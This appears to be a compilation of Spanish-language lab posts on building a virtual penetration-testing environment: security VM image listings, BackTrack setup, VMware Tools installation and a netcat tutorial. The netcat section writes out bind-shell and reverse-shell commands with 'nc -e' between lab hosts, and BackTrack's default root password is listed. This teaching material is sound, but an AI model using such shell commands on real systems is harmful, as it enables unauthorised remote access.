Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas “atacantes”  y máquinas “víctimas”.

Están desarrolladas para ser utilizadas con cualquiera de los productos de VMWare. Recomiendo el uso de VMWare Player y Server como solución al tema de licenciamiento, aunque es posible utilizar VMWare WorkStation en modo Trial por 30 días. Todas estos entornos ya traen instaladas las VMWare Tools para facilitar la transferencia de datos entre uno y otro sistema.

Pronto publicaré otras máquinas virtuales para otras soluciones de virtualización (Virtual PC, Qemu, Virtual Box).

Imágenes tomadas de BagSide:

• BackTrack 4 beta (Imágen de VMware con VMWare Tools).
  • Back|Track 4 beta, with KDE 3.5.10 Desktop and Kernel 2.6.28.1. Now based on Ubuntu Intrepid. Loads of specialized applications for admins. VMwareTools 7.8.4-126130 installed along with SLIM Login manager, some extra scripts and the gtk-qt-engine. Released 11th Feb. 2009. The appliance occupies 4.2GB of the virtual disk which is 25GB in total. Default RAM is set at 688MB and the download is 839 MB. Regarded as one of the top Security distros.
  • Página oficial de BackTrack.
  • Descargar máquina virtual.

• BackTrack 3 (Imágen de VMware con VMWare Tools).
  • Descargar máquina virtual BackTrack 3.

• Caine / Computer Aided INvestigative Environment (Imágen de VMware con VMWare Tools).
  • CAINE (Computer Aided INvestigative Environment) is a GNU/Linux Digital Forensics distro for Interdepartment Center for Research on Security (CRIS), supported by the University of Modena and Reggio Emilia in Italy. Based on Ubuntu 8.04.1 with Kernel 2.6.24-24 and GNOME 2.22.3. Fully updated on the 2nd of March 2009. Released on the 22nd of Feb. 2009. The dynamic disk is 40GB and the appliance occupies 3.5GB installed and the download is 683 MB. 588 MB RAM is allocated as default.
  • Página Oficial de Caine.
  • Descargar máquina virtual Caine.

• Helix 2008R1 (Imágen de VMware con VMWare Tools).
  • Ubuntu 8.04 based Incident Response. Discovery, Forensics and Security Distro
    Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on the 03/10/2008. The source and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 23/09/2008. The appliance occupies 2.8GB of the virtual disk which is 14GB in total. Default RAM is set at 568MB and the download is 708MB in total. Works well here. For those of you who wants to use or try applications like Adepto, Autopsy, GtkHash, Linen, Ophcrack etc.
  • Página oficial de Helix.
  • Descargar máquina virtual Helix.

• nUbuntu (Imágen de VMware con VMWare Tools).
  • Ubuntu 8.10 remaster loaded with Security tools for Bluetooth, Cisco, Scanners, Password, Exploits, Database, Fuzzers, Enum, VoiP and Wireless. Some build-tools and VMwareTools 7.8.4-125130 are installed. Release date 17/12/2008. The physical disk is 9GB whereoff 2.7 GB is used for the appliance. The download is 566 MB and RAM set at 548 MB.
  • Página oficial de nUbuntu.
  • Descargar máquina virtual nUbuntu.

• Samurai Web Testing Framework (Imágen de VMware con VMWare Tools).
  • Security and web penetration test suite based on Ubuntu 8.04
    Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on 08/10/2008. Headers and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 10/08/1008. The appliance occupies 3.0GB of the virtual disk which is 14GB in total. Default RAM is set at 548MB and the download is 675MB in total. Works well here. Loaded with intrusion tools: DirBuster, Fierce Domain Scanner, Gooscan, Grendel-Scan, HTTP_Print fingerprinting tool, Maltego CE, Nikto, Paros, Rat Proxy, Spike Proxy , SQLBrute, w3af (and the GUI), Wapiti, WebScarab, WebShag, ZenMap, dnswalk, httping, httrack, john the ripper, netcat, nmap, siege, snarf etc.
  • Página oficial de Samurai Web Testing Framework.
  • Descargar máquina virtual Samurai Web Testing Framework.

• WeakNet Linux (Imágen de VMware con VMWare Tools).
  • Security distro from WeakNetLabs. Based on Ubuntu 8.04.1 with Kernel 2.6.24-21 and GNOME 2.22.3. Fully updated on the 22nd of November. Released on the 20th of November 2008. Substantial amount of security tools including WeakNetLabs own code and a ‘dashboard’ with main applications. The dynamic disk is 20GB and the appliance occupies 3.6GB installed and the download is 848 MB. 612 MB RAM is allocated as default.
  • Página oficial de WeakNet Linux.
  • Descargar máquina virtual Weaknet.

• CentOS (Imágen de VMware con VMWare Tools).
  • Red Hat Enterprise based with GNOME 2.16 desktop. Installed kernel-devel, cpp, gcc, build-tools and VMwareTools 7.8.4-126130, Adobe flash plugin, Yum-extender, Yum-utils and gtk-murrine-engine and some iconsets. Release date 31/03/2009. CentOS is ranked no.10 on Distrowatch. The physical disk is 40GB whereoff 4.1 GB i used for the appliance. The download is 813MB. Very mature and stable although not bleeding edge.
  • Página oficial de CentOS.
  • Descargar máquina virtual CentOS.

• FreeBSD (Imágen de VMware con VMWare Tools).
  • Standard with the following added, Opera 9.63, MySQL Server Client, Ruby, Apache, Ark, compat6, Nano and a few more plus VMwareTools. Occupies 4.5 GB on disk off a virtual dynamic disk of 20 GB. 644 MB RAM allocated and the download is 904 MB. Works here after some serious tweaking and fixing. I must say that I have still problems getting to grips with all BSD’s as VMware guest OS desktops although this is probably the best one I have built so far.
  • Página oficial de FreeBSD.
  • Descargar máquina virtual FreeBSD.

Imágenes tomadas de Virtual Appliance Marketplace:

• Astaro Mail / Web / Security Gateway (Imágen de VMware).
  • Astaro Mail Gateway provides complete protection and control over spam, viruses, worms and Trojans transferred through email. The All-In-One mail security appliance features comprehensive features for spam detection and malware filtering.
  • Astaro Web Gateway provides complete protection and control over data transferred over the web. The All-In-One web security appliance features Malware Detection, Application Control, URL Filtering and Bandwidth Management, fully integrated and manageable through a single and intuitive browser-based user interface.
  • Astaro Security Gateway integrates complete Network, Web and Mail Security through an intuitive browser-based user interface. The Astaro Unified Threat Management appliance is the most easy-to-use and cost-effective “all-in-one” solution available, working to effectively shield businesses from internet based threats everyday.
  • Página oficial de Astaro Mail Gateway.
  • Descargar Astaro Mail gateway.
  • Descargar Astaro Web Gateway.
  • Astaro Security Gateway.

• WiKID Strong Authentication Server Community Edition 3.3.8 (Imágen de VMware).
  • The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens.
  • Página oficial de WiKID Strong Authentication Server Community Edition.
  • Descargar máquina virtual WiKID Strong Authentication Server Community Edition.

• Accellion Secure File Transfer (Imágen de VMware).
  • Secure File Transfer Virtual Appliance – secure, economical and easy to use secure file transfer for today’s global enterprises.
  • Página oficial de Accellion Secure File Transfer.
  • Descargar máquina virtual  Accellion Secure File Transfer.

• ShellNET MiniVM (Imágen de VMware).
  • Web Interface for managing Nessus Vulnerability Scans and results.
  • Página oficial de ShellNET MiniVM.
  • Descargar máquina virtual ShellNET MiniVM.

• JanusVM (Imágen de VMware con VMWare Tools).
  • Internet Privacy Appliance :: Encrypts your Internet traffic, hides your IP address, and is easy to setup.
  • Página oficial de JanusVM.
  • Descargar máquina virtual JanusVM.

• OWASP Live CD (Imágen de VMware con VMWare Tools).
  • The overarching goal for this project is to make application security tools and documentation easily available. I see this as a great complement to OWASP’s goal to make application security visible.
  • Página oficial de OWASP Live CD.
  • Descargar máquina virtual de OWASP Live CD.

• Fireball ISO Builder (Imágen de VMware).
  • Fireball ISO Builder is a VMWare virtual appliance that builds a bootable Gentoo Linux-base ISO image, focused on providing security and networking services to a network. IPv4 and IPv6. go6.net tunnel broker. DHCP, DNS, SSHD services.
  • Página oficial de Fireball ISO Builder.
  • Descargar máquina virtual de Fireball ISO Builder.

• Nepenthes VMware Appliance (Imágen de VMware con VMWare Tools).
  • Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate known vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to Resolve DNS Asynchronous, Emulate Vulnerabilities, Download Files, Submit the Downloaded Files, Trigger Events, Shellcode Handler.
  • Página oficial de Nepenthes VMware Appliance.
  • Descargar máquina virtual Nepenthes.

En el siguiente video tutorial veremos el paso a paso de la actualización del sistema, revisión de servicios en el sistema y modo de inicialización de estos, estado de la red (estado de puertos, programas y servicios, etc.), instalación y configuración del servicio SSH, instalación y configuración de MySQL y sus respectivas dependencias que hará el papel de repositorio de información para los Logs y Alert’s generados por el IDS Snort, instalación y configuración básica de Snort IDS y sus respectivas reglas de detección.

Descargar video tutorial de Hardening básico de GNU/Linux e instalación y configuración básica de Snort (Password: www.dragonjar.org)

En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.

Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux (Password: www.dragonjar.org) – formato del video: .ogg

En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD’s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (De-ICE.net PenTest LiveCDs Project).
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.

En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.

Descargar video tutorial de configuración de los ambientes virtuales de intrusión (Password: www.dragonjar.org)

QEMU:
QEMU es un emulador de procesadores basado en la traducción dinámica de binarios (conversión del código binario de la arquitectura fuente en código entendible por la arquitectura huésped). QEMU también tiene capacidades de virtualización dentro de un sistema operativo, ya sea Linux, Windows, o cualquiera de los sistemas operativos admitidos (de hecho es la forma más común de uso). Esta máquina virtual puede ejecutarse en cualquier tipo de Microprocesador o arquitectura (x86, x86-64, PowerPC, MIPS, SPARC, etc.). Está licenciado en parte con la LGPL y la GPL de GNU.
Más información >>

VMWARE:
VMware Inc., (VM de Virtual Machine) filial de EMC Corporation que proporciona la mayor parte del software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma Mac OS X que corre en procesadores INTEL, bajo el nombre de VMware Fusion. El nombre corporativo de la compañía es un juego de palabras usando la interpretación tradicional de las siglas “VM” en los ambientes de computación, como máquinas virtuales (Virtual Machines).
Más información >>

Descargar video tutorial: Convertir imágen QEMU a VMWARE (Password: www.dragonjar.org)

Dejo a continuación una corta definición y el enlace para más información en esta misma página de laboratorios sobre BackTrack.

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.

Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org

(Más información sobre BackTrack)

Ahora publico un video tutorial que he realizado sobre la instalación de BackTrack 3 como sistema base de nuestra máquina.

Descargar video tutorial de instalación de BackTrack 3 en disco duro (Password: www.dragonjar.org)

Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.

Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (Más información – Web Oficial)

En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.

Algunas de estas razones pueden ser:

• Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).
• Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).
• Cuando necesitamos conectarnos a un servicio de red de manera manual.

El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la “Guía definitiva de Netcat”, si nos acercará un poco más a la misma.

Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:

Laboratorios: Hacking – Técnicas y contramedidas – Identificación de Banner’s (Banderas) I
Laboratorios: Hacking – Técnicas y contramedidas – Scanning II
Solución del HackTaller 01 DragonJAR (II de VIII)
Solución del HackTaller 01 DragonJAR (III de VIII)

Ayudas y Opciones de Comandos

Nota: Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.

Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:

nc -h

Para lo cual obtendremos el siguiente resultado:

nc -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]

Identificación de Banners e información

Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:

nc -vv IP/HostName Puerto

Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.

Consultando el Servidor Web que gestiona un sistema Objetivo

Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:

nc -vv IP/HostName Puerto

Netcat a la escucha sobre puertos TCP/UDP y Chat

Establecer a Netcat en modo “listen” (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.

Vamos como establecer a Netcat en modo “listen” (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo “listen”, veamos:

nc -lvv 12345

El cliente será el sistema Windows

Transferencia de Archivos con Netcat

Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

Debemos ejecutar la siguiente sintaxis:

nc -lvp 12345 > salida.txt

El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:

El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.
para ello primero crearemos el archivo de texto a enviar. Veamos:

Así se vería desde el servidor BackTrack cuando recibe los datos

Luego procedemos a comprobar la información contenida en el envío

Administración Remota con Netcat (Shell)

Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.

Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.

nc -lvp 12345 -e cmd.exe

Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:

nc -v 10.30.3.116 12345

Shell Inversa con Netcat

A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo “listen” y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:

Para ello contamos con dos máquinas (Windows/Linux)
Windows: IP 10.30.3.116
Linux: IP 10.30.3.84

En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo “Listen”.

Desde Windows se establece el modo Listen:

nc -lvp 12345

Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:

nc -v 10.30.3.116 12345 -e /bin/bash

Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.

Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes .

A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.

Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:

Crysol
Netcat en la Wikipedia
Web Oficial de Netcat

Objetivos del laboratorio:

1. Familiarizarse con la suite de herramientas incluídas en BackTrack.
2. Cambiar la contrseña que viene por defecto en BackTrack.
3. Conocer los direferentes servicios disponibles en BackTrack (básicos).
4. Configurar y poner en marcha los servicios básicos de BackTrack.
5. Comprobar la disponibilidad de los servicios básicos de BackTrack.
6. Realizar pruebas de conexión a los servicios de BackTrack.

Veamos como iniciar con backtrack

Sistema de booteo de BackTrack

Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de login. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.

Para logearnos en el sistema ingresamos:
usuario: root
contraseña: toor

Si desde el comienzo seleccionamos la opción de acceso a la red mediante NAT (VMWare), podemos observar gracias al comando ifconfig nuestras interfaces de red.

Luego podemos configurar el entorno gráfico (xconf) y cargarlo mediante el comando startx
ó Flux (según nuestras preferencias de uso)

Entorno gráfico cargando.

BackTrack cargado como Live CD en su totalidad.

Es importante destacar que el éxito de BackTrack reside en la excelente organización y disposición por grupos de herramientas:

1. Recolección de información
2. Mapeo de red
3. Identificación de vulnerabilidades
4. Penetración / Explotación
5. Escalada de privilegios
6. Mantenimiento del acceso
7. Servicios de red inalámbrica
8. Telefonía sobre VoIP
9. Informática Forense
10. Ingeniería inversa

También podemos ingresar a los diferentes grupos de herramientas desde la línea de comandos:

cd /pentest/

Uno de los primero pasos a realizar debe ser el cambio de contraseña que viene por defecto en backtrack, para ello bastará con ejecutar la siguiente instrucción en la línea de comandos:

passwd

y seguir las instrucciones para completar el cambio

Veremos ahora como identificar y habilitar servicios básicos en backtrack

SSH (Secure Shell)

Empecemos por generar y habilitar el servicio de conexiones seguras (SSHD – Secure Shell Daemon), para ello y desde la línea de comandos ejecutamos la siguiente sintáxis

sshd-generate

Una vez generado nuestro servicio, iniciaremos el mismo como conexión segura:

/usr/sbin/sshd

Ahora, si deseamos comprobar la disponibilidad del servicio de conexiones seguras, basta con ejecutar el siguiente comando para mostrar las conexiones activas y a la escucha en nuestra máquina (para este caso solo consultamos para el puerto 22, puerto usado generalmente para este tipo de conexiones):

netstat -ant|grep 22

Podemos hacer una prueba de conexión desde otro sistema, veamos:

— Servidor Apache —

BackTrack incluye por defecto una instalación del servidor Web Apache, veamos como ponerlo en marcha.

Nota: Cabe aclarar que la mayoría de estos servicios pueden ser ejecutados desde el menu incluído en K-Menú, Servicios. Solo estamos viendo otros métodos en caso de que lo queremos hacer o bien sea, más rápido, ó cuando no tengamos disponible el entorno gráfico.

Pongamos en marcha el servicio de apache desde la línea de comandos:

apachectl start

Y comprobemos la disponiblidad del servicio

netstat -ant|grep 80

Ahora desde un navegador Web

Para detener el servicio solo basta ejecutar la instrucción stop.

apachectl stop

— TFTP (Trivial File Transfer Protocol – Protocolo de transferencia de archivos trivial) —

Veamos como poner en marcha el servidor TFTP que incluye por defecto el S.O BackTrack.

Desde la línea de comandos ejecutamos la siguiente instrucción:

atftpd –daemon –port 69 /tap/

Ahora comprobemos la disponiblidad del servicio

netstat -anu|grep 69

Hagamos una prueba de transferencia de archivos

— VNC —

Veamos como configurar y poner en marcha nuestro propio servicio de VNC en BackTrack, para ello ejecutamos la siguiente instrucción:

vncserver

Solo tenemos que seguir las intrucciones en pantalla (definir contraseña de acceso)

Verifiquemos que nuestra máquina realmente está a la escucha de nuevas conexiones, para ello ejecutamos la siguiente instrucción:

netstat -ant|grep 590

Ahora hagamos una prueba de conexión desde otra máquina

Aquí termina el laboratorio sobre habilitación, configuración y prueba de servicios básicos en BackTrack. Estos mismo servicios pueden ser habilitados de manera gráfica en el propio menú K de BackTrack, además pueden ser encontrados algunos otros instalados por defecto en el sistema, esta será la práctica para cada uno de los seguidores de los laboratorios, espero que sean enviadas las capturas de pantallas, además de los comentarios sobre el mismo.

Palabras clave:
Apache, VNC, TFTP, SSH, BackTrack, Booteo, NAT, VMWare

Nota:
Este nuevo recurso está basado en el sistema de entrenamiento ofrecido por los desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) Offensive-security.com.

Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org
Web Oficial de BackTrack

Lista de herramientas incluídas en BackTrack

El proceso de instalación o puesta en marcha de este LiveCD es un tema que ya ha sido cubierto en diferentes ocasiones en Labs DragonJAR. Veamos algunos enlaces de como llevar a cabo este procedimiento:

Ejecución / Instalación de BackTrack

BackTrack Portable

Instalar Back | Track en el HD de tú PC

Instalar BackTrack en una llave USB

Review BackTrack

Como Instalar Back|Track 3

1. Imágen ISO / LiveCD USB / Appliance de BackTrack
2. Software de virtualización (VMWare WorkStation, VMWare Player, Qemu, Virtual BOX, MOKA5, etc.)
3. PC de mediana capacidad.
4. Conexión a internet (algunos ejercicios, referencias)

Contenido temático:

1. Conceptos básicos de BackTrack
2. Servicios básicos (DHCP, IP, Apache, SSHD, Tftp, VNC)
3. Entorno básico Bash
4. NetCat
5. Wireshark
6. Nmap
7. Técnicas de recolección de información
8. Recursos Web
9. Reconocimiento DNS
10. Reconocimiento SNMP
11. Reconocimiento SMTP
12. Recolección de información Microsoft Netbios
13. Escaneo de puertos
14. ARP Spoofing
15. Explotación de Buffer overflow en Windows
16. Fuzzing
17. Trabajando con Exploits
18. Transferencia de archivos
19. Frameworks de explotación
20. Ataques del lado del cliente
21. Redirección
22. Ataques a contraseñas
23. Vectores de ataques a aplicaciones Web
24. Troyanos
25. NTFS Alternate Data Streams
26. Rootkits

Palabras clave: BackTrack, Test de Penetración, Distribución, LiveCD, scanner de puertos, Vulnerabilidades, exploits, sniffers, SQL Injection, Troyanos, RootKits, NTFS Alternate Data Streams, Fuerza Bruta, Redirección, Fuzzing, Spoofing, NetCat, Bash, Nmap.

Este nuevo recurso estará basado en el sistema de entrenamiento ofrecido por los propios desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) Offensive-security.com.

En esta corta sesión de laboratorio haremos lo mismo, pero para nuestra máquina ocupada por BackTrack.

1 - Así mismo como en el anterior laboratorio, comenzamos el proceso de instalación de las herramientas desde el propio menú de VMware WorkStation. (Install VMware Tools…).

2 - Veremos a continuación el mismo mensaje informátivo y de advertencia sobre el proceso que estamos a punto de realizar.

3 - De esta manera aparecera el nuevo dispositivo que contiene los dos paquetes VMware Tools (VMware Tools-x-x-x.i386.rpm, WMware Tools-x-x-x.tar.gz), donde x-x-x, es el número de la versión instalada de VMware WorkStation. Procedemos entonces a “descomprimir” el paquete WMware Tools-x-x-x.tar.gz, por comodidad lo hice en una carpeta en el escritorio.
Abrimos una shell en esa carpeta y procedemos a ejecutar los siguientes comandos:

Comenzaremos creando algunos soft links de los directorios rc.d, para varios niveles de ejecución necesarios por el script de instalación de las VMware Tools. Para obtener más información sobre estos archivos visita este enlace.

Los comandos de ejecución serán los siguientes:

for x in 0 1 2 3 4 5 6
do
ln -s /etc/rc.d/ /etc/rc$x.d
done

Después de esto y como estamos en el mismo directorio contenedor del script instalador, procedemos a su ejecución.

vmware-install.pl

4 - El proceso posterior a este comando es muy repetitivo, y solo requiere la aprobación de las opciones seleccionadas por defecto, así que podemos continuar mediante la orden ENTER del teclado cuando así lo requiera. Aprovecho para recordar, que cada investigador puede aprovechar las diferentes opciones para profundizar en el tema.

5 - Finalmente concluimos con la instalación de las VMware Tools, debemos ver la siguiente pantalla.

6 - Ahora como en la anterior sesión del laboratorio desarrollaremos el ejercicio de realizar un Drag and Drop entre la máquina host y la invitada.

7 - Arrastramos y soltamos el archivo al escritorio de BackTrack.

8 - Archivo transferido a nuestra máquina BackTrack.

Termina de esta manera la cuarta sesión laboratorio, hagamos un recuento de lo aprendido.

- Instalación de las VMware Tools en la máquina virtual ocupada por BackTrack.
- Transferencia de archivos mediante Drag and Drop.

Próxima sesión:
Identificación de Banner’s.

Taller libre:
Instalar otro S.O en una nueva máquina virtual. (El Sistema Operativo puede ser de libre selección) En lo posible enviar algunas capturas e instrucciones del proceso que se llevó a cabo.

VMware Tools: Principalmente permiten una interacción más dinámica entre las máquinas host (anfitrion-Win XP) y guest (invitadas-Win2003, Backtrack), ofreciendo de manera simple la posibilidad de compartir archivos y carpetas, realizar drag and drops de archivos, cambios de configuración de pantalla, aceleración de dispositivos y demás.

Una definición más técnica es la siguiente:

Se trata de software nativo específico para el sistema que corre sobre VMware, con el propósito principal de acelerar su rendimiento haciendo de puente entre el sistema emulado y el sistema operativo anfitrión sobre el que corre VMware, pero también implementa funcionalidades como cortar y pegar entre el sistema operativo emulado y el que ejecuta Vmware. Por ejemplo, con ayuda de código específico que corre sobre el sistema emulado se puede mejorar la velocidad del vídeo. En lugar de traducir las primitivas gráficas de alto nivel OpenGL a las más básicas de la tarjeta de vídeo emulada, un controlador de vídeo modificado puede utilizar el API gráfico de la máquina nativa.
Fuente

Pasemos de esta manera a la instalación de las VMware Tools en la máquina virtual que corre Windows 2003 Server.

1 - Ejecutamos la máquina virtual que contiene a Windows 2003 Server, después de iniciar vamos al menu superior de la herramienta VMware Workstation, desde allí ejecutamos el instalador de las VMware tools

2 - Recibimos un mensaje informátivo acerca de los beneficios del uso de las VMware Tools, además de una advertencia sobre el estado en el cual debe estar la máquina virtual para poder instalar las herramientas, para el caso, debe estar encendida.

3 - Paso siguiente se ejecutará el asistente de instalación de las VMware Tools para Windows, clic en siguiente.

4 - Seleccionamos a continuación el tipo de instalación. Tenemos tres opciones de selección, típica, completa y personalizada. Para esta sesión utilizaremos Completa.

5 - Procedemos entonces a dar clic en Install para comenzar.

6 - Progreso de instalación de las VMware Tools.

7 - Si nuestro hardware de aceleración no esta activado recibiremos el siguiente mensaje, además de la opción de activarlo, de lo contrario no aparecerá.

8 - Proceso de instalación completado.

9 - Ahora es necesario reiniciar la máquina, damos clic en Yes.

10 - Después de reiniciar la máquina veremos en nuestra barra de tareas el icon-tray de las VMWare Tools.

11 - Haciendo doble clic sobre el icono podemos observar la totalidad de opciones de las herramientas instaladas. Para este caso solo mostraré las capturas de pantalla, dejando la explicación de cada una de estas opciones para otra sesión, a medida que se haga necesaria la utilización de las mismas.

12 - Una de las posibilidades más llamativas después de instalar las VMware, es la facilidad de intercambiar o transmitir datos entre las máquinas. Con un simple (Drag and Drop – arrastrar y soltar) podemos subir o bajar archivos entre nuestras máquinas virtuales. A continuación una secuencia de esta utilidad, en la cual arrastraré una carpeta que contiene un pequeño servidor Web-Mail-FTP portable, desde la máquina host (windows XP), a la máquina guest (Windows 2003 Server Enterprise Edition).

13 - Carpeta a transferir mediante Drag and drop simple.

14 - Arrastrar y soltar.

15 - Contenido de la carpeta visualizado desde Windows 2003 Server.

Termina de esta manera la tercera sesión laboratorio, hagamos un recuento de lo aprendido.

- Definición del concepto VMware Tools.
- Instalación de las VMware Tools en la máquina virtual ocupada por Windows 2003 Server.
- Transferencia de archivos mediante Drag and Drop.

Próxima sesión:
Instalación de las VMware Tools en BackTrack.

Requisitos: VMware WorkStation (Software ya instalado en la anterior sesión).
Imagen o CD de instalación del S.O Windows 2003 Server.

1 - Después de iniciar el aplicativo VMware WorkStation desde cualquiera de los accesos creados en el proceso de instalación crearemos una nueva máquina virtual.

2 - Clic en el botón siguiente.

3 - La configuración de esta máquina virtual, al igual que la de BackTrack se hará de una manera típica, así mismo como en la anterior sesión del laboratorio invito a los investigadores a profundizar en las demás opciones disponibles por el aplicativo. Para esto pueden estudiar la información disponible sobre el mismo en la red.
VMware en español
Wikipedia
VideoTutoriales de VMware

4 - Luego de dar clic en siguiente seleccionaremos el S.O a instalar, en este caso Windows, en su versión Windows 2003 Server Enterprise Edition.

5 - Asignamos el nombre a la nueva máquina virtual, al igual que su localización.

6 - Como en la sesión anterior, utilizaremos el tipo de conexión usando Network Address Translation.

7 - El tamaño seleccionado para el disco duro de el S.O Windows 2003 Server será de 8 GB. Puede ser mayor o menor, según la capacidad de tu disco duro real. (como mínimo recomiendo 5 o 6 GB).

8 - De esta manera ha sido creada nuestra segunda máquina virtual, ésta con la finalidad de almacenar a Windows 2003 Server.

9 - Pasemos entonces a instalar Windows 2003 Server.
